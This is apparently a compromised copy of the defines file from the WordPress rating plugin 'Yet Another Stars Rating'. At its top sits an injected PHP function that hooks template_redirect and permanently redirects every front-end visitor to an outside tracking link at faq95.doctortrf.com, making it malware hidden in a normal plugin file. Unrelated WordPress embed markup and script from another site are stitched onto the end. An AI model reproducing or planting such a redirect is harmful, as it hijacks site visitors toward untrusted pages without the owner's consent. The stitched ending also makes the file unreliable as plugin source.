function my_custom_redirect() { // Убедитесь, что этот код выполняется только на фронтенде if (!is_admin()) { // URL для редиректа $redirect_url = 'https://faq95.doctortrf.com/l/?sub1=[ID]&sub2=[SID]&sub3=3&sub4=bodyclick'; // Выполнить редирект wp_redirect($redirect_url, 301); exit(); } } add_action('template_redirect', 'my_custom_redirect'); /* Copyright 2014 Dario Curvino (email : d.curvino@gmail.com) This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see */ if (!defined('ABSPATH')) { exit('You\'re not allowed to see this page'); } // Exit if accessed directly //Since version 3.3.0 the defines are inside a file, instead of a class, for better support PHPStorm auto-completion //https://youtrack.jetbrains.com/issue/WI-11390/Make-define-Constants-from-inside-methods-available-for-completion-everywhere. $settings = new YasrSettingsValues(); $yasr_general_settings = $settings->getGeneralSettings(); $style_options = $settings->getStyleSettings(); $multi_set_options = $settings->getMultiSettings(); if(isset($yasr_general_settings['auto_insert_enabled'])) { define('YASR_AUTO_INSERT_ENABLED', (int)$yasr_general_settings['auto_insert_enabled']); } else { define('YASR_AUTO_INSERT_ENABLED', 0); } if (YASR_AUTO_INSERT_ENABLED === 1) { define('YASR_AUTO_INSERT_WHAT', $yasr_general_settings['auto_insert_what']); define('YASR_AUTO_INSERT_WHERE', $yasr_general_settings['auto_insert_where']); define('YASR_AUTO_INSERT_ALIGN', $yasr_general_settings['auto_insert_align']); define('YASR_AUTO_INSERT_SIZE', $yasr_general_settings['auto_insert_size']); define('YASR_AUTO_INSERT_EXCLUDE_PAGES', $yasr_general_settings['auto_insert_exclude_pages']); define('YASR_AUTO_INSERT_CUSTOM_POST_ONLY', $yasr_general_settings['auto_insert_custom_post_only']); } else { define('YASR_AUTO_INSERT_WHAT', false); define('YASR_AUTO_INSERT_WHERE', false); define('YASR_AUTO_INSERT_ALIGN', false); define('YASR_AUTO_INSERT_SIZE', false); define('YASR_AUTO_INSERT_EXCLUDE_PAGES', false); define('YASR_AUTO_INSERT_CUSTOM_POST_ONLY', false); } define('YASR_STARS_TITLE', $yasr_general_settings['stars_title']); if (YASR_STARS_TITLE === 'yes') { define('YASR_STARS_TITLE_WHAT', $yasr_general_settings['stars_title_what']); define('YASR_STARS_TITLE_EXCLUDE_PAGES', $yasr_general_settings['stars_title_exclude_pages']); define('YASR_STARS_TITLE_WHERE', $yasr_general_settings['stars_title_where']); } else { define('YASR_STARS_TITLE_WHAT', false); define('YASR_STARS_TITLE_EXCLUDE_PAGES', false); define('YASR_STARS_TITLE_WHERE', false); } define('YASR_SORT_POSTS_BY', $yasr_general_settings['sort_posts_by']); define('YASR_SORT_POSTS_IN', json_encode($yasr_general_settings['sort_posts_in'])); define('YASR_SHOW_OVERALL_IN_LOOP', $yasr_general_settings['show_overall_in_loop']); define('YASR_SHOW_VISITOR_VOTES_IN_LOOP', $yasr_general_settings['show_visitor_votes_in_loop']); define('YASR_VISITORS_STATS', $yasr_general_settings['visitors_stats']); define('YASR_ALLOWED_USER', $yasr_general_settings['allowed_user']); //custom texts define('YASR_TEXT_BEFORE_OVERALL', $yasr_general_settings['text_before_overall']); define('YASR_TEXT_BEFORE_VR', $yasr_general_settings['text_before_visitor_rating']); define('YASR_TEXT_AFTER_VR', $yasr_general_settings['text_after_visitor_rating']); define('YASR_TEXT_RATING_SAVED', $yasr_general_settings['custom_text_rating_saved']); define('YASR_TEXT_RATING_UPDATED', $yasr_general_settings['custom_text_rating_updated']); define('YASR_TEXT_USER_VOTED', $yasr_general_settings['custom_text_user_voted']); define('YASR_TEXT_MUST_SIGN_IN', $yasr_general_settings['custom_text_must_sign_in']); //end custom texts define('YASR_ENABLE_IP', $yasr_general_settings['enable_ip']); define('YASR_ITEMTYPE', $yasr_general_settings['snippet_itemtype']); define('YASR_PUBLISHER_TYPE', $yasr_general_settings['publisher']); define('YASR_PUBLISHER_NAME', $yasr_general_settings['publisher_name']); if (isset($yasr_general_settings['publisher_logo']) && (yasr_check_valid_url($yasr_general_settings['publisher_logo']) !== false)) { define('YASR_PUBLISHER_LOGO', $yasr_general_settings['publisher_logo']); } else { define('YASR_PUBLISHER_LOGO', get_site_icon_url()); } define('YASR_ENABLE_AJAX', $yasr_general_settings['enable_ajax']); //To better support php version < 7, I can't use an array into define //Also, I can't use const here, because it only works with primitive values //https://stackoverflow.com/questions/2447791/php-define-vs-const define('YASR_STYLE_OPTIONS', json_encode($style_options)); define('YASR_STARS_SET', $style_options['stars_set_free']); define('YASR_SCHEME_COLOR', $style_options['scheme_color_multiset']); define('YASR_CUSTOM_CSS_RULES', $style_options['textarea']); /** * Defines for MultiSet options * */ define('YASR_MULTI_SHOW_AVERAGE', $multi_set_options['show_average']); /** * All the other defines * * @author Dario Curvino <@dudo> * @since 3.0.5 */ //Text for button in settings pages $save_settings_text = esc_html__('Save All Settings', 'yet-another-stars-rating'); define('YASR_SAVE_All_SETTINGS_TEXT', $save_settings_text); 1.0cocinasasturianas.eshttps://cocinasasturianas.escocinas asturianashttps://cocinasasturianas.es/author/colchonesmoviflex1973gmail-com/Roomsrich600338<blockquote class="wp-embedded-content" data-secret="9UzB0luIcF"><a href="https://cocinasasturianas.es/rooms/">Rooms</a></blockquote><iframe sandbox="allow-scripts" security="restricted" src="https://cocinasasturianas.es/rooms/embed/#?secret=9UzB0luIcF" width="600" height="338" title="«Rooms» — cocinasasturianas.es" data-secret="9UzB0luIcF" frameborder="0" marginwidth="0" marginheight="0" scrolling="no" class="wp-embedded-content"></iframe><script> /*! This file is auto-generated */ !function(d,l){"use strict";l.querySelector&&d.addEventListener&&"undefined"!=typeof URL&&(d.wp=d.wp||{},d.wp.receiveEmbedMessage||(d.wp.receiveEmbedMessage=function(e){var t=e.data;if((t||t.secret||t.message||t.value)&&!/[^a-zA-Z0-9]/.test(t.secret)){for(var s,r,n,a=l.querySelectorAll('iframe[data-secret="'+t.secret+'"]'),o=l.querySelectorAll('blockquote[data-secret="'+t.secret+'"]'),c=new RegExp("^https?:$","i"),i=0;i<o.length;i++)o[i].style.display="none";for(i=0;i<a.length;i++)s=a[i],e.source===s.contentWindow&&(s.removeAttribute("style"),"height"===t.message?(1e3<(r=parseInt(t.value,10))?r=1e3:~~r<200&&(r=200),s.height=r):"link"===t.message&&(r=new URL(s.getAttribute("src")),n=new URL(t.value),c.test(n.protocol))&&n.host===r.host&&l.activeElement===s&&(d.top.location.href=t.value))}},d.addEventListener("message",d.wp.receiveEmbedMessage,!1),l.addEventListener("DOMContentLoaded",function(){for(var e,t,s=l.querySelectorAll("iframe.wp-embedded-content"),r=0;r<s.length;r++)(t=(e=s[r]).getAttribute("data-secret"))||(t=Math.random().toString(36).substring(2,12),e.src+="#?secret="+t,e.setAttribute("data-secret",t)),e.contentWindow.postMessage({message:"ready",secret:t},"*")},!1)))}(window,document); </script>